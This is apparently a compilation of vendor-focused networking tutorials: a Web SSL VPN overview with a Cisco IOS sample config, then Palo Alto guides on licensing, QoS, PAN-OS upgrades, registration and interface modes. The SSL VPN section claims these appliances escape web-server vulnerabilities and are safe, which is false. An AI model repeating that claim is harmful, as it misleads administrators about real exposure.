We would say that, until recently (the last 5 years), one of the major shortcomings of VPN solutions was the fact that their vendors would in most cases only support their own VPN client, making the product usable only with their software – a major drawback for most companies. Another big problem with VPN clients is the fact that they usually support specific operating systems. For example, many vendors provide VPN clients for Windows-based operating systems but few support 64bit operating systems! Linux and Unix systems are usually out of luck when it comes to vendor-based VPN clients but, thanks to the open source community, solutions are freely available.

But these are just a few of the problems VPN users and administrators are faced with. Getting access to your corporate VPN in most cases requires custom ports to be opened on the firewall in front of it. Hotels and public hotspots usually block these ports and only allow very specific protocols to pass through, such as HTTP, HTTPS, POP3, SMTP and others.

Web SSL VPN has started to change all that. As the name implies, Web SSL VPN is a popular variation of the VPN concept, moving in a completely different direction from the one most vendors have been used to.

What is Web SSL VPN?

Web SSL VPN is, as the name implies, a web-based VPN client. While this might not mean much to many, it's actually a revolution in VPN technology! By moving from the program-based VPN client to a web-based VPN client, the operating system is no longer a problem. You can download, install and run your web-based VPN client on any operating system without a second thought!

Web SSL VPN works by communicating over the standard HTTPS (SSL) protocol, allowing it to pass through almost any proxy or firewall that might be limiting your access. Once connected, a small Java-based client is downloaded through the computer's web browser, creating a virtual connection between your computer and the VPN concentrator or firewall providing the service.

web-ssl-vpn-1

An early version of Cisco Web VPN client, being downloaded and preparing its installation

The great part about Web SSL VPN is that the client will automatically download onto your computer if needed and install itself. Once your session is over, it can be configured (by the administrator setting up the VPN service) to automatically delete itself from the computer, leaving no trace of the VPN client!

This means that using Web SSL VPN, you can safely log on to your corporate network from another computer without requiring special certificates to be installed or group passwords at the user end. All you need to know is your own credentials and the URL of your Web SSL VPN concentrator.

web-ssl-vpn-2

After installation, your connection is established with the corporate Firewall

Another big advantage of Web SSL VPN is that it supports ‘split tunnelling' natively. Split tunnelling is a technique whereby, when connected to a VPN network, only traffic destined for that network is encrypted and passed over the tunnel. All other traffic (e.g. Internet browsing) bypasses the tunnel and is sent directly to the Internet like any normal connection. Split tunnelling is a wonderful feature that allows users to do necessary work through the VPN while also maintaining a direct Internet connection. Of course, this feature is easily disabled, again, by the administrator of your VPN concentrator.

Note: WebVPN for Cisco IOS routers is fully covered in our article: Configuring WebSSL VPN AnyConnect on Cisco IOS Routers.
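For readers who want a feel for the router-side setup, below is a minimal, hedged sketch of an IOS WebVPN (SSL VPN) gateway and context. The gateway name, context name, policy group, IP address, address pool and split-tunnel network are all hypothetical placeholders, the AnyConnect/SVC client package is assumed to be already installed on the router, and the exact commands can differ between IOS releases. Refer to the article mentioned above for a complete, tested configuration.

! Hypothetical values - adjust names, addresses and the SSL trustpoint to your environment
ip local pool SSLVPN-POOL 10.10.10.1 10.10.10.50
!
! The gateway listens for HTTPS (TCP 443) connections from remote users
webvpn gateway SSL-GATEWAY
 ip address 203.0.113.1 port 443
 ssl trustpoint TP-SSLVPN
 inservice
!
! The context ties the gateway to a policy group handed to connecting users
webvpn context SSL-CONTEXT
 gateway SSL-GATEWAY
 policy group SSL-POLICY
  ! Enable the full-tunnel (SVC/AnyConnect) client and assign addresses from the pool
  functions svc-enabled
  svc address-pool "SSLVPN-POOL"
  ! Split tunnelling: only traffic to 192.168.10.0/24 is sent over the VPN
  svc split include 192.168.10.0 255.255.255.0
 default-group-policy SSL-POLICY
 inservice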

Is Web based VPN Considered Safe?

Fortunately, web-based VPN connections do not suffer from the same vulnerabilities as websites and web servers. The technology might use the same protocols (HTTP & HTTPS); however, the Web SSL VPN implementation is completely different for most vendors. The non-web-server-based design of Web SSL VPN offers a much more secure approach and is generally considered safe. The main difference here is that you've got a dedicated appliance offering a web service, not a general-purpose server with a buggy operating system and a web server full of exploits.

Web SSL VPN is considered to be very secure and capable of encrypting your user sessions so that no data is compromised over the VPN.

Client-Side Security of Web SSL VPN

The latest Web SSL VPN solutions have certainly improved in both performance and the security requirements they can enforce on the end user. They are now capable of checking a number of parameters on the host's side to decide whether or not to install. Administrators are able to create their own policies that allow the Web SSL VPN client to install on a host PC only if the host has a firewall installed and operating, or if it has a valid, up-to-date antivirus. If any of these requirements are not met, the Web SSL VPN client will not install.

VPN Application Support for Web SSL VPN

Early Web SSL VPNs, or first-generation Web SSL VPNs, supported fewer features and protocols and provided secure access mainly to intranet web-based application services. Their limited functionality and immaturity did not allow many companies to see them as an alternative to the well-known VPN client program.

As things progressed and the second generation of Web SSL VPNs came out, there was full support for all IP-based applications. Intranet web services, file services, ERP services and pretty much anything else you can think of are now capable of running through a second-generation Web SSL VPN. This is also called a true SSL VPN solution, as it completely replaces the IPSec-based VPN client used until now.

Today, all Web SSL VPNs offer tunnelling of all IP services, thereby falling into the second category.

Business Value of Web SSL VPN

While this fairly new technology is great, is there any real value in it for business? The answer is clearly ‘Yes'. Here are a few pointers that will help clarify:

• Easy to set up, with a lot less administrative overhead and technical support required due to the ease of use.

• Costs less than traditional IPSec VPNs. They do not require proprietary VPN client software to be purchased or licensed (in most cases).

• SSL makes use of port 443. This almost guarantees it will work through any firewall that provides standard Internet access, without the need for any special configuration. No more troubled users unable to connect to the corporate network due to a restrictive Internet connection.

• Compatible with all operating systems and web browsers.

• Full IP application support – replacing IPSec VPN client programs completely.

• Ability to create security policies and allow access only when these policies are met, e.g. firewall enabled, up-to-date antivirus and more.

• Available on servers, firewalls and even routers! You don't necessarily need a dedicated machine just for your VPN users, as the feature is supported even on small devices such as Cisco 870 series routers!

WebVPN for Cisco IOS routers is fully covered in our article: Configuring WebSSL VPN AnyConnect on Cisco IOS Routers.

Summary

We saw what the Web SSL VPN hype is all about, and it's good. As time passes, more vendors will start offering these solutions in their products. The message is 'use them': don't be afraid to adopt these solutions, as they will help you solve a great deal more problems and get the job done better, faster and safer.

Invest in Web SSL VPN – it's the future of remote VPN access.

Palo Alto Networks Software NGFW (Flex) Credits

The Ultimate Guide to Palo Alto Networks Software NGFW (Flex) Credits. How NGFW credits work, Renewal considerations, Online Credit Estimator, Deployment Profiles

Palo Alto Networks - Introduction to Software NGFW Flex Credits

Discover the ins and outs of using Palo Alto Networks’ Software NGFW (Flex) credits to seamlessly renew your cloud-based or virtualized software NGFW devices! Dive into this exciting guide where we unravel the mysteries of software NGFW credits, show you how they're allocated to your deployment profile, and walk you through the renewal and verification process.

Learn to calculate your required NGFW credits with the online Credit Estimator and much more. Get ready to master your NGFW credits and keep your network security top-notch!

Key Topics:

Grasping the Basics of Software NGFW (Flex) Credits

Palo Alto Networks’ cloud-based (Azure, AWS, GCP) and virtualized (ESXi, Hyper-V, KVM) deployments, aka software NGFW devices, are licensed using Software NGFW credits (Flex Credits). When deploying a software NGFW device, you are required to purchase the correct amount of NGFW credits to allow the deployment, licensing and operation of the device. The number of NGFW credits required depends on the specifications of your NGFW device, which include:

  • Number and type (VM-Series or CN-Series) of firewalls deployed.
  • Number of vCPUs per firewall.
  • Subscriptions, e.g. Threat Prevention, URL Filtering, WildFire etc.
  • Management options, e.g. Panorama Management, Panorama Log Collector etc.
  • Support options, e.g. Premium or Platinum support.

NGFW credits are subscription-based, meaning they expire 12 or 36 months after purchase (depending on your contract), regardless of how many credits you use. For example, if you purchase a 100-credit, 12-month subscription and use 80 NGFW credits for your deployment, the remaining 20 credits stay available for consumption but expire at the end of the contract.

It's crucial to purchase the right amount of NGFW credits to minimize any that go unused.

Estimating Your NGFW Credit Needs with the Credit Estimator



Palo Alto Firewalls - Understanding and configuring QoS

Configuring QoS on Palo Alto Firewalls: Class-based Policies, QoS Profiles, Enabling QoS on Firewall Interfaces

Palo Alto Firewalls - Understanding and configuring QoS

This article’s purpose is to help you quickly master Palo Alto QoS concepts and learn to configure QoS on Palo Alto Firewalls in a simple and efficient way. QoS is considered a complicated topic; however, thanks to Palo Alto’s intuitive firewall GUI and our real-world scenarios, you’ll quickly grasp all the necessary QoS basics and be ready to implement your own QoS policies!

You’ll learn basic QoS terms such as Ingress and Egress traffic, Differentiated Service Code Point (DSCP), Traffic Policing, Traffic Shaping, Palo Alto QoS Classes, Palo Alto QoS Policies, how to build Palo Alto QoS policies, how to configure Palo Alto QoS Classes and finally how to enable and monitor QoS on Palo Alto firewall interfaces (both standalone & AE Aggregate interfaces), view QoS bandwidth graphs and more!

Key Topics:

Find more great articles by visiting our Palo Alto Firewall Section.

Introduction to Palo Alto QoS

QoS was born from the IEEE group during 1995-1998 with the establishment of the IEEE 802.1p standard. The main purpose of QoS is to prioritise desired traffic over other types of traffic, or to limit the amount of bandwidth applications can consume, by utilizing different mechanisms. This ensures network performance and avoids bottlenecks, congestion or overutilization of network links. A frequently used example of QoS is the prioritisation of real-time traffic, e.g. voice or video, over other types of traffic:

Palo Alto Firewall - QoS Priority Queues & Packet PrioritizationQoS Priority Queues - Packet classification and prioritization

In the example above, voice packets (blue) are given a higher priority than others and are therefore immediately forwarded by the firewall out of the output interface. Since voice packets are very sensitive to delay, they are usually handled with priority to avoid issues in real-time voice streams, e.g. a VoIP telephone call between two endpoints.

Overview of QoS Configuration on Palo Alto Firewalls



How to Manually Upgrade Update Install PAN-OS

How to Manually Download, Import & Install PAN-OS on Palo Alto Firewalls via CLI & Web GUI interface

Palo Alto PAN-OS Manual update - upload - upgrade

This article provides comprehensive guidance on the manual process of downloading, uploading (importing) and installing any PAN-OS version on a Palo Alto Firewall. It details the steps for searching for and downloading the desired PAN-OS version, as well as the supported methods for uploading the software to your Palo Alto Firewall, including Web, TFTP and SCP. Additionally, the article offers valuable tips aimed at facilitating a smooth and successful upgrade process.

The necessity for a manual upgrade of a Palo Alto firewall arises in instances where the system operates within an isolated environment employing an air-gap architecture and lacks direct internet access. This requirement also applies in scenarios where the firewall has no valid licenses, remains unregistered, or serves as a replacement unit, as in a Return Merchandise Authorization (RMA) context.
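In such an isolated setup, once the PAN-OS image has been downloaded to a local workstation or server, it can be imported into the firewall from the CLI. The sketch below is indicative only: the server address, path and image filename are hypothetical placeholders, and the exact syntax can vary slightly between PAN-OS versions.

Import the image from a TFTP server:

> tftp import software from 192.168.1.10 file PanOS_850-10.1.9

Or pull it over SCP instead:

> scp import software from admin@192.168.1.10:/images/PanOS_850-10.1.9

Install the imported image and reboot when prompted:

> request system software install version 10.1.9
> request restart system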

Whether performing upgrades manually or automatically, it is crucial to consider the same upgrade path rules outlined in our article Complete guide to upgrading Palo Alto firewalls. Individuals unfamiliar with these rules are strongly encouraged to review the article before initiating any PAN-OS upgrade.

Key Topics:

Explore our dedicated Palo Alto section to access a collection of high-quality technical articles.

Downloading PAN-OS Software

Begin by downloading the needed software from the Palo Alto Networks support page. Make sure you have a valid support contract.

Once logged in, select Updates on the left pane, followed by Software Updates from the right pane:


IPSec VPN - Palo Alto Firewall and Meraki MX

Complete Guide: Configuring IPSec VPN between Palo Alto Firewall & Meraki MX Security Appliance

configuring IPSec VPN between Palo Alto firewall and Meraki MX

This article will show you how to configure an IPSec VPN tunnel between a Palo Alto firewall (all PAN-OS versions) and a Meraki MX security appliance. Our comprehensive guide includes IPSec VPN setup for static & dynamic IP endpoints, full tunnel VPN configuration, split tunnel VPN configuration, special considerations for full & split tunnel modes, IPSec Phase 1 (IKE gateway & crypto policies), IPSec Phase 2 (tunnel encryption algorithms & authentication) plus more.

 Key Topics:

Palo Alto Firewall Setup

Meraki MX Security Appliance Setup

This article assumes both Palo Alto firewall and Meraki MX are fully configured to allow local clients access to the internet. We’ll first begin with the configuration of the Palo Alto firewall and then work on the Meraki MX appliance.

Visit our Palo Alto Firewall section for more articles covering Palo Alto technologies.

Step 1 – Create a Tunnel Interface

Under Network, select Interfaces, then the Tunnel menu option. The firewall will now show all configured tunnel interfaces. The interface ‘tunnel’, as shown below, exists by default on all firewalls:




Complete Guide to Upgrading Palo Alto Firewall PAN-OS & Panorama. Prerequisites, Upgrade Paths, Config Backup, Application & Threats Update & More

Upgrading your Palo Alto Firewall or Panorama Management System to the preferred PAN-OS release is always recommended, as it ensures the device remains stable and safe from known vulnerabilities and exploits, while also allowing you to take advantage of new features.

This article will show you how to upgrade your standalone Firewall PAN-OS and explain the differences between a Base Image and a Maintenance Release Image. We’ll also explain the PAN-OS upgrade paths, show how to back up and export your configuration, and deal with common PAN-OS install errors (upgrading requires greater content version). Finally, we will explain why newer PAN-OS releases might not be visible for download in your firewall’s software section.

While the same process described below can be used to upgrade Panorama’s PAN-OS, it is important to ensure the Panorama PAN-OS version is equal to or greater than that of the firewalls it manages. When upgrading PAN-OS for both Panorama and Firewall appliances, always upgrade Panorama first.

Key Topics:

Our article How to Manually Download, Import & Install PAN-OS on Palo Alto Firewalls via CLI & Web GUI interface provides detailed instructions and insights on PAN-OS upgrades for unlicensed/unregistered Palo Alto Firewalls.

Prerequisites for PAN-OS Upgrades

It is important to note that only eligible Palo Alto customers, that is, those with an active contract, can receive updates for their firewalls. Our article How to Register and Activate Palo Alto Support, Subscription Servers, and Licenses covers this process in great detail.

Understanding PAN-OS Upgrade Paths

Whether a direct (one-step) upgrade to the latest PAN-OS is possible depends on the current version your firewall is running. When upgrading from a fairly old to a newer PAN-OS version, multi-step upgrades might be necessary. This ensures the device’s configuration is migrated to the newer PAN-OS’s supported features and that nothing “breaks” during the upgrade process.

Like most vendors, Palo Alto Networks produces a base image and maintenance releases. Maintenance releases are small upgrades of the base image that deal with bug fixes and sometimes introduce small enhancements.

As a rule of thumb, firewalls should be running the Palo Alto preferred PAN-OS release (requires account login), and it is generally a good practice to install these releases as they are published.

When upgrading your PAN-OS to the latest maintenance release of a newer base release, the firewall will likely require you to download the new base release before allowing you to install its latest maintenance release.

For example, our firewall is currently running version 9.0.3-h3, noted by the ‘tick’ on the Currently Installed column, and our goal is to upgrade to version 9.1.4 (preferred release) as shown below:

Palo Alto PAN-OS upgrade path

When attempting to download version 9.1.4, a maintenance release for base 9.1.0, we received an error (see screenshot below) explaining that we need to download the 9.1.0 base image first (no installation required). Once downloaded, we can proceed with the download and installation of version 9.1.4.

palo alto firewall upgrading requires greater content version

Backing Up & Exporting Firewall Configuration

It is imperative to back up and export the configuration before attempting an upgrade. To create a backup go to Device > Setup, then select the Operations (3) tab and Save named configuration snapshot (4):

backup current palo alto firewall configuration

Once the backup is complete, it is highly recommended to export the configuration by selecting Export named configuration snapshot (5) and saving it in a safe place.
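If you prefer the CLI, a similar backup and export can be performed there as well. The snapshot filename and SCP destination below are hypothetical placeholders and the sketch is indicative only:

Save a named snapshot of the running configuration (configuration mode):

> configure
# save config to pre-upgrade-backup.xml
# exit

Export the snapshot off-box over SCP (operational mode):

> scp export configuration from pre-upgrade-backup.xml to admin@192.168.1.10:/backups/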

Downloading & Installing PAN-OS Software

We will be upgrading our firewall from PAN-OS 9.0.3-h3 to 9.1.4. As explained previously, for this process, we will download base 9.1.0 and then download & install maintenance release 9.1.4.

Newer PAN-OS versions can be downloaded directly from the firewall GUI (recommended). Alternatively, they can be downloaded from https://support.paloaltonetworks.com and then uploaded manually.

From the GUI, go to Device > Software, then click on Check Now (3) to update the software list. When complete, click on Download (4) for base image 9.1.0:

download install pan-os on palo alto firewall

When complete, click on Download (5) for version 9.1.4, then Install (the option will become available once the image has downloaded). During the installation a progress bar will be displayed:

palo alto firewall installing pan-os software

As soon as the installation process is complete, the firewall will ask to reboot:

palo alto firewall reboot after pan-os installation
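For reference, the same download-and-install sequence can also be performed from the PAN-OS CLI. The commands below are a hedged sketch using the versions from our example; always confirm the available images and your upgrade path first:

Refresh the list of available PAN-OS images:

> request system software check

Download the base image (no installation required), followed by the maintenance release:

> request system software download version 9.1.0
> request system software download version 9.1.4

Install the maintenance release and reboot when prompted:

> request system software install version 9.1.4
> request restart system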

Dealing with Common Install Errors: Upgrading Requires Greater Content Version

A common error users are faced with when attempting to install a newer PAN-OS is the “Error: Upgrading from xxx to xxx requires a content version 8226 or greater and found 8165-5521” error as shown below:

palo alto firewall upgrade requires greater content version

This error is related to the Applications and Threats version the firewall is currently running, which is most likely outdated.

To fix this, go to Device > Dynamic Updates and click on the Check Now (3) button as shown below:

palo alto firewall upgrading applications threats version

Next, download (5) the latest version of Applications and Threats. Once the download is complete, the install option will become available. Proceed with the installation of the newly downloaded Applications and Threats version:

palo alto firewall installing applications and threats
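If you prefer, the same content update can be triggered from the CLI; the brief sketch below is indicative only:

Check for, download and install the latest Applications and Threats content:

> request content upgrade check
> request content upgrade download latest
> request content upgrade install version latest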

Another common error is the Image File Authentication Error – Failed to Load into Software Manager error. This is covered in detail in our article How to Fix Palo Alto Firewall “Error: Image File Authentication Error”.

Why Aren’t the Latest PAN-OS Releases Available for Download?

Palo Alto Networks continuously publishes new PAN-OS releases; however, they might not be available or visible on your firewall if they are not compatible with the version your firewall is currently running.

At the time of writing, PAN-OS 10.0 was available; however, if you take a close look at the available software, you will notice that it is not listed:

palo alto firewall check for new pan-os

After upgrading to version 9.1.4 we went back and clicked the Check Now button. PAN-OS 10 was available to download and install:

 pan-os new images after upgrade

Summary

This article showed how to upgrade a standalone Palo Alto Firewall’s PAN-OS. It explained the different PAN-OS images (Base Image, Maintenance Release) and the PAN-OS upgrade paths that depend on your current PAN-OS version. We also saw how to download and install the PAN-OS software, covered common installation errors (the “requires greater content version” error) and finally explained why the latest PAN-OS releases may not be made available in your firewall’s software download section.


How to Fix Palo Alto Firewall “Error: Image File Authentication Error – Failed to Load Into Software Manager” error during PAN-OS Software Download

palo alto firewall software upgrade error

Keeping your Palo Alto Firewall up to date with the latest PAN-OS software updates is an important step to ensure your organization is protected against the latest PAN-OS software vulnerabilities and software bugs, while at the same time taking advantage of Palo Alto’s latest security enhancements and capabilities.

While Palo Alto Networks makes the software upgrade process an easy task, sometimes problems can occur. One frequently seen issue is the “Error: Image File Authentication Error – Failed to Load into Software Manager” error when trying to download a new software image.

Readers can also refer to our articles How to Manually Download, Import & Install PAN-OS on Palo Alto Firewalls via CLI & Web GUI interface and Complete Guide to Upgrading Palo Alto Firewall PAN-OS & Panorama. Prerequisites, Upgrade Paths, Config Backup, Application & Threats Update & More for more technical insights and advice on PAN-OS upgrades.

This error can occur on a standalone or HA-Pair Firewall configuration:

palo alto firewall image file authentication error

Additional technical articles are available in our Palo Alto Firewall Section.

How To Fix The 'Image File Authentication Error'

To fix this problem, simply click the Check Now link at the bottom left corner. This will force the Palo Alto Firewall to connect to the update server and refresh the list of available software images:

palo alto firewall checking for new software
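For firewalls managed over SSH, the same refresh can, to the best of our knowledge, be triggered from the CLI with the software check command:

> request system software check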

 As soon as the above refresh process is complete, you can proceed to download the desired software image:

palo alto firewall download new software PAN-OS image

The screenshot below confirms the selected image has been downloaded and loaded into software manager, ready to be installed:

palo alto firewall new PAN-OS software image downloaded

More Information About The Error

The “Error: Image File Authentication Error – Failed to Load into Software Manager” error is encountered after initiating the download of any image from within the Software area:

palo alto firewall - initiate software download

As soon as the user initiates the download process, the Firewall will begin downloading the selected PAN-OS version. Once the download is complete, the progress bar reaches the 99% mark and pauses there for a significant amount of time, as shown below:

palo alto firewall PAN-OS software download in progress

During this process, a closer look at the firewall logs via SSH shows the following error is produced:

admin@PA-850-Firewall.cx-Primary(active)> tail follow yes mp-log ms.log

2019-10-05 17:02:52.534 +1000 client dagger reported op command was SUCCESSFUL
2019-10-05 17:02:55.946 +1000 get_sw_ver_info file: /opt/pancfg/mgmt/global/upgradeinfo.xml
2019-10-05 17:02:55.967 +1000 get_sw_ver_info file: /opt/pancfg/mgmt/global/uploadinfo.xml
2019-10-05 17:02:55.968 +1000 No upload information available
sh: line 1: /tmp/pan/downloadprogress.12337: No such file or directory
'cfg.fail-conn-on-cert': NO_MATCHES

The tail follow yes command continuously displays new entries appended to the ms.log file, so you can observe all log activity in real time.

The log output seems to imply that there is a missing file or that some information is not available. The issue is fixed as soon as the firewall is forced to check for new updates.

Summary

This article explains how to resolve the “Error: Image File Authentication Error – Failed to Load into Software Manager” error encountered when trying to download a new firewall software image. We showed the error produced by the firewall and how to fix it by forcing the firewall to check for new software updates. We also dived into the mp-log ms.log file and examined the messages produced there during the error.


How to Register a Palo Alto Firewall and Activate Support, Subscription Services & Licenses. Covers All Models.

palo alto networks logo

This article explains how to register and activate your Palo Alto Firewall appliance to obtain technical support, RMA hardware replacement, product updates, antivirus updates, WildFire, antispam updates, Threat Prevention, URL Filtering, GlobalProtect and more. The article covers all Palo Alto Firewalls including: PA-220, PA-820, PA-850, PA-3220, PA-3250, PA-3260, PA-5220, PA-5250, PA-5260, PA-5280, PA-7050, PA-7080 and all VM-Series.

Customers purchasing a new Palo Alto Firewall appliance or support contract will receive an authorization code which is required to activate their technical support, license and service subscriptions – this, plus lots more useful information is included below.

Key Topics:

Additional technical articles are available in our Palo Alto Firewall Section

The diagram below shows the steps new customers should follow to successfully register and activate their Palo Alto products:

palo alto license registration diagram

Benefits of a Support Account, Firewall Registration and License Activation

Registering your security appliance has many benefits, especially when you consider that any unpatched or outdated security appliance is unable to provide adequate protection against today’s complex and intelligent security threats. Furthermore, by registering your appliance you are protecting your investment, as you become a ‘known’ customer to Palo Alto, allowing you to engage the vendor and benefit from the wide range of services offered.

By creating a Support Account, registering your Firewall appliance and activating your License you’ll be able to perform the following:

  • Register and manage your firewall appliance(s). Palo Alto calls these “Assets”
  • Create and manage support cases
  • Create and manage users from your organization
  • Give members of your team access to Palo Alto support services
  • Gain access to a variety of tools found in the support portal
  • Obtain knowledge and answers to questions
  • Obtain access to the Palo Alto live community
  • Download PAN-OS (Palo Alto Operating System) software updates for your device
  • Download Antivirus updates
  • Download Antispam updates
  • Download Threat protection updates
  • Update App-ID Database on your device
  • Ensure the URL Filtering engine is up to date
  • Gain access to Wildfire which allows the firewall to safely ‘detonate’ suspicious files in the cloud

The above list is indicative and shows the variety of services offered to registered Palo Alto customers with an active subscription service.

Creating a Palo Alto Support Account - New Customers

Registering your account is a simple process that only takes a few minutes. During the registration process you’ll be able to register your Palo Alto Firewall appliance and later activate your support and subscription license. To begin, visit the Palo Alto Support page https://support.paloaltonetworks.com/ and click on the Sign In link at the top right corner of the page:

palo alto networks customer support portal

On the next screen, enter a valid email address, verify you’re human (reCAPTCHA) and finally click on the Submit button:

palo alto networks - creating a new support account

On the next page, select to register your device using its Serial Number or Authorization Code, or alternatively register a VM-Series model purchased from a public cloud marketplace or a Cloud Security Service Provider (CSSP). In our example, we’ll be selecting the first option. When ready, click on the Submit button:

palo alto create a new support account device registration

Next, enter all required details to create the new account. Towards the end of the page you can enter the Device Serial Number or Auth Code. We selected to insert the device serial number:

palo alto new user registration final screen

The Auth Code is an 8-digit code which is emailed to the customer (PDF file) as soon as the physical appliance is shipped from Palo Alto Networks. This means that under most circumstances the Auth Code is received before the physical appliance.

When filling in your details keep in mind that it is important to ensure the address entered is correct as it will be used for any future RMA process.

It is highly advisable to subscribe to all mailing lists to ensure you receive updates and security advisory notifications.

Once the registration process is complete, you can proceed with activating the support and software licenses.

Registering a Palo Alto Device – New & Existing Customers

Existing customers with support contracts need to follow the similar process outlined below in order to register their new Palo Alto device and activate the subscription services purchased.

To begin, visit the Palo Alto Support page https://support.paloaltonetworks.com/ and click on the Sign In link at the top right corner of the page. On the next page, click on the Go to portal button:

palo alto networks - customer support portal

Next, enter your Email Address and Password to complete the login process.

Once done, you’ll be presented with the main Customer Support page, where you’ll find important alerts regarding the support portal and a summary of your recent activity, as shown in the screenshot below. Now click on the Register a Device button:

palo alto networks register a device for existing customers

On the next page select the correct Device Type. We selected Register device using Serial Number or Authorization Code to register our firewall appliance. When ready, click on the Next button:

palo alto networks - existing customers firewall device registration

Now provide the device Serial Number, Device Name (provide a meaningful name to help distinguish this device from other devices) and Location information for RMA purposes. Tick the Device will be used offline option if the device is to be used in an isolated environment with no internet access.

When ready click on the Agree and Submit button at the bottom right of the page (not shown):

palo alto networks - existing customers firewall registration device information

After a few seconds the support portal will confirm our Palo Alto Firewall was successfully registered and offer the highly recommended option of Run Day 1 Configuration:

palo alto networks - existing customers firewall device registration successful

The optional Day 1 Configuration step can be run by clicking on the Run Day 1 Configuration button. If you decide to skip this step you can find this option from the main support page, under the Tools section as shown in the screenshot below:

palo alto run day 1 configuration option

When selecting Run Day 1 Configuration, you need to provide some basic information about your firewall such as Hostname, Management IP address, PAN-OS version, DNS Servers etc. This information is then used to generate an initial firewall configuration file (xml file) based on Palo Alto Networks Best Practices.

You can then download the file and upload it to the firewall appliance using it as a base configuration.
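One way to load the generated file onto a new firewall, assuming its management interface is already reachable over the network, is via the CLI. The host, path and filename below are hypothetical placeholders and the sketch is indicative only:

Copy the Day 1 configuration file onto the firewall:

> scp import configuration from admin@192.168.1.10:/configs/day1-config.xml

Load it as the candidate configuration and commit (configuration mode):

> configure
# load config from day1-config.xml
# commit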

The Run Day 1 Configuration option is a great start for people with limited experience with Palo Alto Firewalls, but it is also a good practice to follow for any newly deployed firewall and is therefore highly recommended.

The Run Day 1 Configuration tool is designed for new (unconfigured) firewalls! Applying it to a production device will clear its configuration!

Activating Palo Alto Support and Subscription License

Once the Firewall registration process is complete, the final step is to activate your license. When this is done, the Firewall appliance will be covered for warranty replacement, be able to download PAN-OS software updates and, depending on the subscriptions purchased, have access to WildFire, URL Filtering, Anti-Spyware, Threat Intelligence updates and more.

To activate licenses, your Palo Alto user account must be assigned the ELA Administrator role. You can add this role under Members > Manage Users

To begin, from the Support Home page navigate to Assets > Devices. Here you’ll see a list of all currently registered devices. Locate the device for which the license needs to be activated and click on the pencil icon under the Actions column:

palo alto networks - activate support and subscription services - step 1

On the next page select Activate Auth-Code under the Activate Licenses section and insert the Authorization Code. Now click on the Agree and Submit button:

palo alto networks - activate support and subscription services - step 2

Once the activation process is complete a green bar will briefly appear confirming the license was successfully activated. Notice how the page has been updated to include the features activated along with their Expiration Date:

palo alto networks - activate support and subscription services - step 3

If you have multiple service (or feature) licenses purchased for your product, for example a Threat Prevention License, WildFire License, Support etc., insert the Authorization Code for one service and click on the Agree and Submit button. Repeat the process until all services/features are activated.

This completes the Palo Alto License Activation process. You should now have all licenses/features fully registered and able to obtain technical support for your device(s).
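If the firewall has internet access through its management interface, the newly activated licenses can usually be retrieved and verified directly from its CLI; the two commands below are a brief, hedged sketch:

Retrieve the licenses from the Palo Alto Networks licensing server and then verify them:

> request license fetch
> request license info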

Summary

In this article we outlined the benefits of registering your Palo Alto security device. We explained in detail how to create a Palo Alto support account, register your Palo Alto Firewall and how to activate your Palo Alto License & Subscription services in order to obtain technical support, RMA hardware replacement, product updates, antivirus updates, wildfire, antispam updates, Threat Prevention, URL Filtering, Global Protect and more.


Palo Alto Firewall Configuration Options. Tap Mode, Virtual Wire, Layer 2 & Layer 3 Deployment modes

Our previous article explained how Palo Alto Firewalls make use of Security Zones to process and enforce security policies. This article will explain the different configuration options for physical Ethernet and logical interfaces available on the Palo Alto Firewall.

It’s easy to mix and match the interface types and deployment options in real world deployments and this seems to be the strongest selling point of Palo Alto Networks Next-Generation Firewalls. Network segmentation becomes easier due to the flexibility offered by a single pair of Palo Alto appliances.

Below is a list of the configuration options available for Ethernet (physical) interfaces:

  • Tap Mode
  • Virtual Wire
  • Layer 2
  • Layer 3
  • Aggregate Interfaces
  • HA

Following are the Logical interface options available:

  • VLAN
  • Loopback
  • Tunnel
  • Decrypt Mirror

The various interface types offered by Palo Alto Networks Next-Generation Firewalls provide flexible deployment options.

Tap Mode Deployment Option

TAP Mode deployment allows passive monitoring of the traffic flow across a network by using the SPAN feature (also known as mirroring).

A typical deployment would involve the configuration of SPAN on Cisco Catalyst switches where the destination SPAN port is the switch port to which our Palo Alto Firewall connects, as shown in the diagram below:

 Palo Alto Next Generation Firewall deployed in TAP mode

Figure 1. Palo Alto Next Generation Firewall deployed in TAP mode

The advantage of this deployment model is that it allows organizations to closely monitor traffic to their servers or network without requiring any changes to the network infrastructure.

During the configuration of SPAN it is important to ensure the correct SPAN source and SPAN Destination ports are configured while also enabling Tap mode at the Firewall.

Tap mode offers visibility of applications, users and content; however, we must be mindful that the firewall is unable to control the traffic, as no security rules can be applied in this mode. Tap mode simply offers visibility in the ACC tab of the dashboard. The catch here is to ensure that the tap interface is assigned to a security zone.
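As a rough illustration of the switch-side setup, below is a minimal Cisco IOS SPAN (monitor session) sketch. The interface numbers are hypothetical: the source is the port (or ports) carrying the traffic to be monitored and the destination is the port connected to the firewall's tap interface.

! Hypothetical values - adjust interface numbers to your environment
! Mirror both received and transmitted traffic from the monitored port
monitor session 1 source interface GigabitEthernet1/0/10 both
! Send the mirrored traffic to the port connected to the firewall's tap interface
monitor session 1 destination interface GigabitEthernet1/0/48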

Virtual Wire  (V-Wire) Deployment Option

Virtual Wire, also known as V-Wire, deployment uses Virtual Wire interfaces. The great thing about a V-Wire deployment is that the firewall can be inserted into an existing topology without requiring any changes to the existing network topology.

The V-Wire deployment option overcomes the limitations of TAP mode deployment, as engineers are able to monitor and control traffic traversing the link. A Virtual Wire interface supports App-ID, User-ID, Content-ID, NAT and decryption.

 Palo Alto Next Generation Firewall deployed in V-Wire mode

Figure 2. Palo Alto Next Generation Firewall deployed in V-Wire mode

Layer 2 Deployment Option

Palo Alto Networks Next Generation Firewall can also be deployed in Layer 2 mode. In this mode switching is performed between two or more network segments as shown in the diagram below:

 Palo Alto Next Generation Firewall deployed in Layer 2 mode

Figure 3. Palo Alto Next Generation Firewall deployed in Layer 2 mode

In Layer 2 deployment mode the firewall is configured to perform switching between two or more network segments. Traffic traversing the firewall is examined, as per policies, providing increased security and visibility within the internal network.

In this mode the firewall interfaces are capable of supporting Access or Trunk Links (802.1Q trunking) and do not participate in the Spanning Tree topology. Any BPDUs received on the firewall interfaces are directly forwarded to the neighboring Layer 2 switch without being processed. Routing traffic between VLAN networks or other networks can be achieved via a default Gateway which is usually a Layer 3 switch supporting InterVLAN routing, a Firewall security appliance, or even Router-on-a-Stick design.

Layer 3 Deployment Option

